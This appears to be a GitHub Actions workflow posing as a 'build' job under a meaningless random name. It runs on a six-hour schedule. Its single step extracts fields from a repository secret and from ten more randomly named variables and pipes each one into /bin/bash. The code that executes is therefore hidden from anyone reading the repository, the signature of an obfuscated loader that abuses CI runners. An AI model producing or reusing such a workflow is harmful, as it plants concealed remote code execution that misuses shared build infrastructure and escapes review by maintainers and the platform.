name: establishbelowground
on:
  workflow_dispatch:
  schedule:
    - cron: '19 1/6 * * *'

jobs:  # 3088
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: establishbelowground
        env:
          a6: ${{ secrets.a6 }}
        run: |
          echo $a6 | jq -r .sbrgs44 | /bin/bash
          echo $hl026 | jq -r .oqju51451 | /bin/bash
          echo $muxf84773 | jq -r .spyo50 | /bin/bash
          echo $ztfxl6 | jq -r .xyg133 | /bin/bash
          echo $st13272 | jq -r .demkz65554 | /bin/bash
          echo $ss1170 | jq -r .dou2 | /bin/bash
          echo $puz73418 | jq -r .tvann4 | /bin/bash
          echo $ymqq62 | jq -r .yo381 | /bin/bash
          echo $g4897 | jq -r .abmns21 | /bin/bash
          echo $byhvb8 | jq -r .cyupj1500 | /bin/bash
          echo $y17523 | jq -r .fjmul70 | /bin/bash

